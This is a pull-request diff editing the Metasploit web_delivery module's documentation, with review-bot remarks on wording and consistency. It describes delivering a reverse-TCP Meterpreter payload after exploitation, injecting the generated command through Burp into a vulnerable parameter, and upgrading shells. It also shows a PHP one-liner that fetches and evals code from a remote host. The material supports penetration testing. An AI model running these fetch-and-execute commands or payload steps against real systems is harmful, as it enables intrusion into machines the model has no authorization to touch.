Merge pull request #39 from tdoan-r7/mod_doc_cmd
MS-1196 Minor edits to the kb for the web_delivery module
bug/bundler_fix
commit
9aa5f4f03a
|
@ -1,31 +1,26 @@
|
||||||
As a web server, web_delivery provides a great way to deliver a payload during post exploitation,
|
As a web server, the web_delivery module provides a stealthy way to deliver a payload during post exploitation because the payload does not touch the disk.
|
||||||
with the intention to stay stealthy because the payload does not touch the disk.
|
|
||||||
|
|
||||||
Currently, web_delivery supports three different languages for delivery: Python, PHP, and
|
Currently, web_delivery supports three different languages for delivery: Python, PHP, and
|
||||||
Powershell. You should be able to tell which one you can use based on the target environment
|
Powershell. You should be able to tell which one you can use based on the target environment
|
||||||
you are in.
|
you are in.
|
||||||
|
|
||||||
For example: if you have gained access through a PHP application, then it's safe to assume you can
|
For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're in a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports Powershell.
|
||||||
use PHP. If you're in a Windows server (such as Windows Server 2008), then it's probably safe to
|
|
||||||
say the target supports Powershell.
|
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
To be able to use web_delivery, you must gain access to the target machine first, with the ability
|
To be able to use the web_delivery module, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter.
|
||||||
to execute either the Python, or PHP, or Powershell interpreter.
|
|
||||||
|
|
||||||
At that point, you would use web_delivery similar to the following example:
|
At that point, you would use the web_delivery module like in the following example:
|
||||||
|
|
||||||
1. Start msfconsole
|
1. Start msfconsole
|
||||||
2. Do: ```use exploit/multi/script/web_delivery```
|
2. Run: ```use exploit/multi/script/web_delivery```
|
||||||
3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
|
3. Run: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
|
||||||
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
|
4. Run: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
|
||||||
5. Do: ```set LHOST IP``` (The IP the payload should connect back to)
|
5. Run: ```set LHOST IP``` (The IP the payload should connect back to)
|
||||||
6. Do: ```run```
|
6. Do: ```run```
|
||||||
7. At this point, a handler is up for that payload. And the module should instruct you to execute
|
7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
|
||||||
a command.
|
8. Copy the command. Depending on your pentesting scenario, you can either inject the
|
||||||
8. Copy the command. Depending on your pentesting scenario, typically you can either inject the
|
command and get code execution, or run it from the target's shell and get a session:
|
||||||
command and get code execution, or run it from the target's shell, and get a session:
|
|
||||||
|
|
||||||
```
|
```
|
||||||
msf exploit(web_delivery) > run
|
msf exploit(web_delivery) > run
|
||||||
|
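Review bot: step 6 is left inconsistent with the rest of the list in this hunk: steps 2 through 5 were changed from "Do:" to "Run:", but step 6 still reads `6. Do: ```run````; change it to `6. Run: ```run```` so the verification steps use one verb throughout. Two smaller points in the same hunk: the product name is spelled "PowerShell" (both the intro paragraph and the "Windows Server 2008" example keep "Powershell"), and step 3 ties PHP to the numeric index `set target 1`, which is only correct as long as the module's target order does not change; since the step already points the reader at `show targets`, consider telling them to confirm the index there rather than asserting "1 is PHP".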
@ -46,14 +41,13 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/
|
||||||
|
|
||||||
**Python**
|
**Python**
|
||||||
|
|
||||||
Python is a fairly popular language, especially on unix-based systems. For example, it comes with
|
Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3.
|
||||||
Ubuntu Linux by default since 8.04. As well as Debian, and Mac OS X since 10.3.
|
|
||||||
|
|
||||||
**PHP**
|
**PHP**
|
||||||
|
|
||||||
PHP is a fairly popular language for web servers, especially Apache.
|
PHP is a fairly popular language for web servers, especially Apache.
|
||||||
|
|
||||||
**Powershell/win**
|
**Powershell/Windows**
|
||||||
|
|
||||||
Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
|
Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
|
||||||
are the first Windows versions to come with Powershell by default. Older Windows systems such as XP
|
are the first Windows versions to come with Powershell by default. Older Windows systems such as XP
|
||||||
|
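Review bot: the PHP paragraph in this hunk ("PHP is a fairly popular language for web servers, especially Apache.") says nothing about the runtime requirement that the hunk header itself shows: the generated command is `php -d allow_url_fopen=true -r "eval(file_get_contents('http://...`, so delivery depends on being able to pass `-d allow_url_fopen=true` (or on the option already being enabled); a sentence noting that would save readers a confusing failure. Likewise the rewritten Python paragraph lists which OS releases ship Python by default but not which Python major version the one-liner expects, which is the detail an operator actually needs to check on the target. Finally, the heading was changed to "**Powershell/Windows**" but the body still spells it "Powershell"; the product name is "PowerShell".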
@ -68,16 +62,15 @@ web_delivery would work nicely for a web application with a command execution vu
|
||||||
One way to approach this would be:
|
One way to approach this would be:
|
||||||
|
|
||||||
1. Start exploit/multi/script/web_delivery
|
1. Start exploit/multi/script/web_delivery
|
||||||
2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that
|
2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution.
|
||||||
results in arbitrary code execution.
|
|
||||||
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
|
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
|
||||||
|
|
||||||
**Shell upgrade**
|
**Shell upgrade**
|
||||||
|
|
||||||
web_delivery is also useful to upgrade a shell type payload to a meterpreter one.
|
web_delivery is also useful to upgrade a shell type payload to a Meterpreter one.
|
||||||
|
|
||||||
Here's how that can be done:
|
Here's how that can be done:
|
||||||
|
|
||||||
1. Start exploit/multi/script/web_delivery that generates/
|
1. Start exploit/multi/script/web_delivery that generates/
|
||||||
2. On msfconsole, interact with the shell, and copy/pate the command.
|
2. In msfconsole, interact with the shell, and copy/paste the command.
|
||||||
3. You should get a meterpreter session.
|
3. You should get a Meterpreter session.
|
||||||
|
|
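Review bot: step 1 of the "Shell upgrade" list is a truncated sentence that this commit carries over unchanged: `1. Start exploit/multi/script/web_delivery that generates/` ends mid-clause on both sides of the diff. Since the PR's purpose is to clean up this kb entry, complete the sentence (what the module generates and which target/payload to set for the upgrade) or cut it back to "Start exploit/multi/script/web_delivery" so it matches step 1 of the "One way to approach this" list above. The "copy/pate" to "copy/paste" fix and the "Meterpreter" capitalization in steps 2 and 3 look good.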